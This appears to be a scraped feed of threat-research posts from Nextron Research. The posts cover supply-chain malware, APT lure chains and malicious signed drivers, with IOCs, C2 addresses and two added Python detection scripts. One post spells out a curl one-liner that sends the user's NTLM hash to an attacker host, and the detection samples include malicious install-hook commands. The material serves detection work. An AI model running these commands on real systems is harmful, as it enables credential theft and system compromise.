Nextron Research ⚡️

268 posts

@nextronresearch

Nextron threat research team. Signatures, rules, and analysis focused on eliminating blind spots.

Frankfurt, Germany. Joined October 2024
13 Following, 3.3K Followers
Pinned Tweet
Nextron Research ⚡️ @nextronresearch
We analyzed the top 500 most successful THOR rules – “successful” meaning: they detected samples that were either ignored or missed by nearly all AV engines on VirusTotal. Some rules detect clear malware. Others reveal dual-use tools, renamed hacktools, misused admin binaries, or forensic leftovers. Most of these samples showed 0 AV detections, the rest only minimal hits. Not all threats are payloads. Not all detections are flashy. But these rules consistently light up the blind spots in AV and EDR coverage – where attackers hide comfortably. THOR doesn’t replace existing tools. It shows you what they forgot to tell you. nextron-systems.com/2025/06/18/the…
Nextron Research ⚡️ @nextronresearch
🛡️ New YARA rules for the #AtomicArch supply-chain attack

~1,500 #ArchLinux AUR packages were reportedly hijacked and backdoored to deploy a Rust infostealer and eBPF rootkit via malicious PKGBUILD install hooks invoking npm install directly or through bun. Our YARA rules detect the malicious PKGBUILD, .SRCINFO, .install files and ALPM hooks. Scan your systems for free with THOR Lite or THOR Cloud Lite 🔍

🔗 Rules: github.com/Neo23x0/signat…
📰 phoronix.com/news/Arch-Linu…
💬 discuss.cachyos.org/t/aur-compromi…
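As an added illustration of the detection idea in this post, the following Python heuristic (written for this page; it is not Nextron's YARA rule set and the sample files are constructed, not the actual AtomicArch artifacts) scans Arch `.install` scripts and ALPM hook files for JavaScript package-manager invocations (`npm`, `npx`, `bun`, `bunx`) inside install-time hook functions or hook `Exec` lines. A package built by makepkg is expected to ship its files; an install hook that pulls code from a registry during the pacman transaction is out of place and worth a closer look.

```python
import re
from typing import Dict, List

# Hook functions that pacman runs from a package's .install script.
INSTALL_HOOKS = {
    "pre_install", "post_install",
    "pre_upgrade", "post_upgrade",
    "pre_remove", "post_remove",
}

# Top-level shell function "name() {" ... "}" with the closing brace at column 0.
FUNC_RE = re.compile(r"^(\w+)\s*\(\)\s*\{[ \t]*\n(.*?)^\}", re.M | re.S)

# JavaScript package managers that have no business running during a pacman transaction.
PKG_MGR_RE = re.compile(r"\b(?:npm|npx|bun|bunx)\b")


def scan_install_script(script: str) -> List[Dict[str, str]]:
    """Flag npm/bun calls inside the install hook functions of a .install script."""
    findings = []
    for m in FUNC_RE.finditer(script):
        name, body = m.group(1), m.group(2)
        if name not in INSTALL_HOOKS:
            continue
        for line in body.splitlines():
            stripped = line.strip()
            if stripped.startswith("#"):
                continue  # comments are not executed
            if PKG_MGR_RE.search(stripped):
                findings.append({"where": name, "line": stripped})
    return findings


def scan_alpm_hook(hook_text: str) -> List[Dict[str, str]]:
    """Flag npm/bun calls in the Exec line of an ALPM hook ([Trigger]/[Action] INI file)."""
    findings = []
    for line in hook_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "Exec" and PKG_MGR_RE.search(value):
            findings.append({"where": "Exec", "line": value.strip()})
    return findings


# Constructed samples for this example (not the real AtomicArch files).
BENIGN_INSTALL = """\
post_install() {
    update-desktop-database -q
}

post_upgrade() {
    post_install
}
"""

SUSPICIOUS_INSTALL = """\
post_install() {
    # "theme helper" that pulls code from the npm registry at install time
    cd /usr/share/example-theme && npm install --silent >/dev/null 2>&1
}

post_upgrade() {
    bun install
}
"""

SUSPICIOUS_HOOK = """\
[Trigger]
Operation = Install
Operation = Upgrade
Type = Package
Target = *

[Action]
Description = Refreshing theme cache...
When = PostTransaction
Exec = /bin/sh -c 'npm install -g @example/theme-helper'
"""

if __name__ == "__main__":
    print(scan_install_script(BENIGN_INSTALL))  # no findings
    for f in scan_install_script(SUSPICIOUS_INSTALL) + scan_alpm_hook(SUSPICIOUS_HOOK):
        print(f"{f['where']}: {f['line']}")
```

This is a triage heuristic, not a verdict: a hit means "this package runs a registry client at install time, read it", and the same two functions can be pointed at the `.install` files and `/usr/share/libalpm/hooks` content of a package cache to find candidates for a full THOR scan.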
Nextron Research ⚡️ @nextronresearch
🚨 New #PolinRider delivery package caught by our artifact scanner on NPM: tailwind-color-shades@1.0.2 (author: deepthought26)

It's a typosquat that plants import './src/bootstrap' into index.ts → a shuffle/Function-eval loader that pulls its next stage from blockchain dead-drops (TRON→Aptos→BSC→XOR→eval), leading to Beavertail → InvisibleFerret.

Same DPRK-linked operation but a newer variant:
- campaign marker _V = A6-Shadow-15
- new XOR key: m6:tTh^D)cBz?NM]
- new obfuscator build

Package: fab731cd8005d9d73a8fe862a8bfea32c945bd957bbb9861f36401d18b878c8b
Decrypted final stage: 2cfede38fb121a71a2f3607474aa8cd588a99f51b37e5e6f0d8cb789fa275032
Nextron Research ⚡️ @nextronresearch
We analyzed a SideCopy (APT36 / Transparent Tribe) chain targeting Indian defense personnel

A weaponized PowerPoint package posing as an internal military briefing. Same actor. New lure.

The bait is a folder named "PPT for Breifing at HQ Northern Command," built around a convincing .pptx decoy and a double-extension shortcut (...pptx.lnk) carrying a shell32 icon so it reads as a normal PowerPoint to the target. Nothing is dropped to disk by the shortcut itself. The LNK kicks off a staged loader hidden inside a nested excel\ folder.

Execution chain: batch/PowerShell stager opens the decoy .pptx + drops the payload → jrnswry acrhyis.exe, a .NET CrimsonRAT loader → beacons to a hardcoded C2 → remote access, recon, exfil

Our @thor_scanner run produced the following YARA hits:
valhalla.nextron-systems.com/info/search?ke…
valhalla.nextron-systems.com/info/rule/SUSP…
valhalla.nextron-systems.com/info/search?ke…
valhalla.nextron-systems.com/info/rule/SUSP…

Shortcut (LNK): virustotal.com/gui/file/30632…
Loader (excel.bat): virustotal.com/gui/file/befcf…
Payload (CrimsonRAT): virustotal.com/gui/file/abfac…
Decoy PPTX: virustotal.com/gui/file/853ed…
Nextron Research ⚡️ @nextronresearch
Small follow-up on this Nimbus Manticore aka UNC1549 aka Smoke Sandstorm research:

We continued hunting around the Ebix lure and found more Ebix-themed domains:
zoom-ebix[.]com
ebixexam[.]com
ebix-itrack[.]com

Not confirmed Nimbus Manticore infra yet. Some don’t resolve. We also found another Ebix-themed domain that looks suspicious at first glance, but we’re keeping it out of the list for now because it could also just be a badly run or auto-generated IT/vendor portal. Yes, that happens too…

The funny part: one Ebix-themed login page we found seems to be a phishing-awareness page, probably created via CanIPhish for the real Ebix organization.

So yes, lure-based domain hunting works. But also: don’t blindly turn every matching domain into an IOC. That’s how threat intel becomes compost.
Nextron Research ⚡️@nextronresearch

Update: We identified two new UNC1549 / Nimbus Manticore phishing domains hosting the same fake Ebix recruitment portal from our previous reporting:
hxxps://ebix[.]portal-career[.]com
hxxps://ebix-exam[.]com

IOCs and rules are available in THOR Lite and THOR Cloud Lite. Sign-up and scan your systems for free right now: thorcloud-lite.nextron-systems.com/ui/register

Nextron Research ⚡️ @nextronresearch
🚨 New NPM typosquats caught by our artifact scanner: "twcompose-utils" and "classbreeze-utils" impersonating "@tailwindcss/typography".

They ship the real plugin + an obfuscated dropper (AES-GCM + RC4 strings). On require() they fetch an OS-specific native 2nd-stage from 194[.]11[.]226[.]41[:]4000, drop it as a fake "GoogleUpdateService" / "WpnUserSvc.exe", run it detached, and set up Startup-folder persistence on Windows.

C2: urlscan.io/ip/194.11.226.…

2nd-stage payloads (SHA-256):
agent.exe e76741a1747dde6b4e4dbc88ca16fc8eb59385b6b18f6c64d1b397dfe0843647
agent-darwin-arm64 d8f8c416ebde7d90088d6029a5b9b88a2a021bf3b99896f205d78732d376ef5e
agent-linux-amd64 cc5c72e90d7eda42e66a54c0197abbba1951561d3d864963b6aca7fe43a0ab06
agent-linux-arm64 22480680a22ba444a3924f906cbec947d11f011200b89ef6b67afd48b4c71d77
Nextron Research ⚡️ @nextronresearch
We found a WHQL-signed kernel module that abuses Windows firmware table registration as a covert kernel↔user communication channel.

Instead of exposing a device object and IOCTL interface, it registers a custom firmware provider ("BSBS"), allowing userland interaction through standard Windows firmware table APIs. The implementation is compact and stealthy, supporting memory allocation, memory copy operations, and indirect function dispatch from user mode into kernel context.

An unusual example of firmware table registration being repurposed as a hidden ring3↔ring0 communication mechanism.

Name: NewDriverMMM
SHA256:
1d9224a72e64bb2aad289edc81ea0720c764511c3e2b5beb5d0d5ce82a719abd
fdb3907ddda9ff9bd9ec4f8bd29aad823da77b5b3bf599813fecd034b0221189
SpcSpOpusInfo: 深圳市奥联信息安全技术有限公司
Telemetry: China 🇨🇳, Japan 🇯🇵
Nextron Research ⚡️ @nextronresearch
Our Artifact Scanner flagged "pylogxo", a PyPI typosquat of "pylogx" dropping Sirkeira Stealer from 69[.]164[.]245[.]166 to harvest browser credentials, Discord, Roblox data & more. Package has been removed from PyPI but the payload is still live.

pylogxo: 7089c8c1c117fa7ffdc68abe4b3c4a6f83b2b4f1827d805bf52d8705cf14eaab
Stealer: 3de7ccdf0fbe423b5646640d572a8a675f275e82f38eee76e067864b9993e730
C2: urlscan.io/result/019ebae…
Nextron Research ⚡️ @nextronresearch
One more malicious npm package spotted: "hex-type@3.0.2" - part of the ongoing MicrosoftSystem64 RAT campaign that exfiltrates data via HuggingFace.
Microsoft Threat Intelligence@MsftSecIntel

Compromised npm packages (utils-terminal@3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials.

Indicators of compromise (IOCs):
- npm user: hexalpha10 / author: toskypi
- 195.201.194[.]107:8010 (WebSocket C2)
- c2-toskypi.onrender[.]com (HTTP C2)
- huggingface[.]co/api (exfiltration endpoint)
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence)
- MicrosoftSystem64.service (Linux systemd persistence)
- \MicrosoftSystem64 (Windows scheduled task)
- MicrosoftSystem64/payload.js (payload directory)

Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.

Nextron Research ⚡️ @nextronresearch
🚨 Our artifact scanner detected a malicious PyPI package: "cache-compat-utils@0.1.0" (publisher: "electracrimson").

The package uses "_patch.py" as a dropper to fetch the Bun runtime from GitHub and execute "_runtime.bin". Deobfuscated, the payload is a CI/CD secret stealer + self-propagator with Shai-Hulud-style worm behavior:
🔑 Steals AWS, GitHub & npm credentials
☁️ Targets AWS IMDS, ECS, Vault & k8s tokens
🐙 Uses GitHub GraphQL + npm recon to spread

virustotal.com/gui/file/95d4c…
Nextron Research ⚡️ @nextronresearch
Did you know curl can be used to leak your NTLM hash with a simple one-liner on your Windows machine? Mind you, curl is available on all Windows since Windows 10 / Windows Server 2019.

curl -u : --ntlm attacker.com

We discovered this technique being abused in recent Iranian APT campaigns of UNC1549 also known as Smoke Sandstorm and Nimbus Manticore.

How it works: On Windows, curl (the included Microsoft version) uses SSPI to handle NTLM handshakes. When credentials are empty (:), curl passes NULL to AcquireCredentialsHandle - a documented SSPI behavior that tells Windows to use the current user's logon session credentials managed by LSASS, without ever touching the plaintext password. The result: your NTLMv2 response is sent straight to the attacker.

For more details: github.com/curl/curl/blob…

That's how a feature becomes an exploit. We published a free Sigma rule to detect this behavior: github.com/SigmaHQ/sigma/…
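To make the detection side of this post concrete, here is a small Python check written for this page (it is not the Sigma rule the post refers to) that applies the same logic to process-creation telemetry: `curl.exe` started with an SSPI authentication option and empty `-u`/`--user` credentials. It goes slightly beyond the post in also covering `--negotiate`, because curl's own documentation tells users to pass a fake `-u :` with that option too, so the same default-credential path applies. The events are constructed in a Sysmon-like shape for the example; nothing here is real telemetry.

```python
import ntpath
import re
from typing import Dict, List

# curl options that make the Windows build authenticate through SSPI.
# --ntlm is the case in the post; --negotiate also expects the fake "-u :".
SSPI_AUTH_FLAGS = {"--ntlm", "--negotiate"}

# Splits a command line into tokens, honouring double quotes so that
# --user ":" and -u "" are seen as the empty-credential forms they are.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> List[str]:
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in TOKEN_RE.finditer(cmdline)]


def has_empty_credentials(tokens: List[str]) -> bool:
    """True if -u/--user is given with an empty user:password ("" or ":")."""
    for i, tok in enumerate(tokens):
        if tok in ("-u", "--user"):
            value = tokens[i + 1] if i + 1 < len(tokens) else ""
            if value in ("", ":"):
                return True
        elif tok.startswith("--user="):
            if tok[len("--user="):] in ("", ":"):
                return True
        elif tok.startswith("-u") and not tok.startswith("--"):
            # attached short form, e.g. "-u:"
            if tok[2:] == ":":
                return True
    return False


def is_sspi_logon_cred_candidate(image: str, cmdline: str) -> bool:
    """curl.exe asking for NTLM/Negotiate while supplying no credentials of its own."""
    if ntpath.basename(image).lower() != "curl.exe":
        return False
    tokens = tokenize(cmdline)
    if not any(t.lower() in SSPI_AUTH_FLAGS for t in tokens):
        return False
    return has_empty_credentials(tokens)


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    return [ev for ev in events
            if is_sspi_logon_cred_candidate(ev["Image"], ev["CommandLine"])]


# Constructed process-creation events (Sysmon-like fields, not real telemetry).
CURL = r"C:\Windows\System32\curl.exe"
EVENTS = [
    {"User": "CORP\\alice", "Image": CURL,
     "CommandLine": "curl -u : --ntlm attacker.example"},
    {"User": "CORP\\bob", "Image": CURL,
     "CommandLine": 'curl --ntlm --user ":" https://attacker.example/'},
    {"User": "CORP\\svc", "Image": CURL,   # explicit credentials: ordinary usage
     "CommandLine": "curl -u svc:REDACTED --ntlm https://intranet.example/api"},
    {"User": "CORP\\carol", "Image": CURL,  # no authentication at all
     "CommandLine": "curl -s https://updates.example/feed.json"},
    {"User": "CORP\\dave", "Image": CURL,
     "CommandLine": "curl -u: --ntlm http://10.0.0.5/share"},
    {"User": "CORP\\erin", "Image": CURL,
     "CommandLine": "curl --negotiate -u : http://files.example/"},
]

if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(f"{hit['User']}: {hit['CommandLine']}")
```

The explicit-credential and no-auth events are included on purpose: `--ntlm` by itself is normal on intranets, and alerting on it alone would bury the signal. The combination of an SSPI auth flag with empty `-u` is what selects the logon-session credential path described in the post, and that combination is what the rule should key on; a destination outside the organisation's own hosts raises the severity further.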
Nextron Research ⚡️ @nextronresearch
🚨 New Linux exfiltration tool designed to bypass EDR

The malware abuses Linux io_uring to asynchronously access /etc/shadow and exfiltrate credential material over TCP with a minimal runtime footprint. Unlike traditional stealers that rely on conventional blocking I/O, it leverages kernel-managed submission and completion queues to perform stealthy file access. The sample appears optimized for rapid credential collection and exfiltration, with no significant persistence mechanisms observed.

Because activity is offloaded through io_uring, it can significantly reduce visibility for monitoring solutions focused primarily on traditional syscall telemetry, making detection more challenging.

Mitigation: Organizations whose security tooling lacks visibility into io_uring activity should validate coverage and consider restricting or disabling io_uring on systems where the performance tradeoff is acceptable.

IOCs
ea586cf89af8057ab44053cae16ea496fdb0337f88404db9618d0e0308b8a9e6
87fde30bc260a22caefc58e431e805330b5c0503ff5550ba571634756115387d
Nextron Research ⚡️ @nextronresearch
We analyzed a Sharp Dragon APT chain targeting Malaysian government officials

A weaponized Word document posing as a US-China policy brief. Same actor. New campaign. New geography.

The document is convincing, formatted as a legitimate diplomatic policy brief titled “Malaysia Policy Brief: Trump China Visit”, with a professional structure clearly designed for senior officials tracking US-China-ASEAN relations. The payload is a VBA macro that hides the embedded binary across 15 Form TextBox objects in the document’s UserForm. Nothing is dropped to disk until execution.

Execution chain: VBA macro decodes the 15 TextBox chunks at runtime → assembles and drops a loader disguised as OneNote.exe → custom AES-128-ECB + LZ4 decompression, intentionally avoiding CryptoAPI → Download_s.dll beacon → HTTP GET to /microsoftonline/common/oauth2/authorize.php impersonating Microsoft → NtMapViewOfSection into rundll32.exe → Stage 4 delivered

Our @thor_scanner run produced the following YARA hits:
SUSP_VBA_Dropper_Feb26 valhalla.nextron-systems.com/info/rule/SUSP…
APT_MAL_DLL_Loader_May24 valhalla.nextron-systems.com/info/rule/APT_…

Doc sample (2/62): virustotal.com/gui/file/88b99…
Second stage: virustotal.com/gui/file/dccb3…
Downloader (stage3) sample: virustotal.com/gui/file/d0133…
Nextron Research ⚡️ retweeted
Marius Benthin @marius_benthin
Two more recently published npm packages related to the same malware campaign: "ulid-os@3.0.2" and "obfus-jsxy@3.2.0". Both detected by THOR with multiple YARA rules.
Microsoft Threat Intelligence@MsftSecIntel

Compromised npm packages (utils-terminal@3.2.1, logger-active@3.2.1) are abusing Hugging Face repos as exfiltration infrastructure. The packages deploy a remote access trojan (RAT) that captures keystrokes, screenshots, and crypto wallet credentials.

Indicators of compromise (IOCs):
- npm user: hexalpha10 / author: toskypi
- 195.201.194[.]107:8010 (WebSocket C2)
- c2-toskypi.onrender[.]com (HTTP C2)
- huggingface[.]co/api (exfiltration endpoint)
- HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64 (persistence)
- MicrosoftSystem64.service (Linux systemd persistence)
- \MicrosoftSystem64 (Windows scheduled task)
- MicrosoftSystem64/payload.js (payload directory)

Defenders: treat unexpected huggingface[.]co/api calls from non-ML workloads as suspicious.

Nextron Research ⚡️ @nextronresearch
Detecting Nimbus Manticore (UNC1549)

While previous reporting documented the threat actor’s operations, our analysis focuses on defender value:
◾ Multiple public YARA rules
◾ Campaign-specific detections
◾ Generic hunting logic
◾ IOC enrichment
◾ Detection opportunities across the full infection chain

From LinkedIn lures and fake hiring portals to AppDomain hijacking, Azure infrastructure, and custom implants.

Read the full research by @cod3nym: eu1.hubs.ly/H0vPgF80

#ThreatResearch #YARA #ThreatIntel
Nextron Research ⚡️ @nextronresearch
We've made it easier to deploy THOR Thunderstorm as a container by publishing a ready-to-use Docker Compose template and base image

For those who haven't come across Thunderstorm before: It's our self-hosted scanning service that turns THOR into an API-driven scanning backend. Files and artifacts are collected from source systems and analyzed centrally.

The interesting part is not Docker itself. The interesting part is where this becomes easier to deploy:
- Edge devices and network appliances that cannot run THOR directly
- Embedded and exotic operating systems
- Legacy systems with limited resources
- OT and critical infrastructure environments
- Mail and file gateway scanning
- Malware ingestion pipelines
- Build and artifact scanning workflows
- Supply-chain security checks

Collectors can be configured to retrieve only specific file types, paths, sizes, ages or file signatures and forward them to a central Thunderstorm instance. The heavy lifting happens on the Thunderstorm server, not on the source system.

And because this still causes confusion surprisingly often 😄 THOR Thunderstorm is not SaaS. The service runs in your environment. The samples stay in your environment. No files need to be uploaded to Nextron.

We put together the deployment template and documentation to make this easier to test and deploy.

Repository: github.com/NextronSystems…
Nextron Research ⚡️ @nextronresearch
We identified a WHQL-signed kernel driver keylogger, likely deployed as an anti-cheat BYOVD

SHA256: bb1b4e46f1e4a7f17b1b04ee08c33400b2b6fd2327612a4d84da81e2656ba48b
Signature SpcSpOpusInfo=Xryus Technologies.

Stealth
- APIs resolution by hashing
- XOR-obfuscated strings
- Time-randomized paths (no IOC)

Capabilities
- Retrieve captured keystrokes from kernel ring buffer (cf. picture)
- Pull captured mouse events ring buffer
- Suppress predetermined keystrokes

POC gist.github.com/pierrehpezier/…
Nextron Research ⚡️ retweeted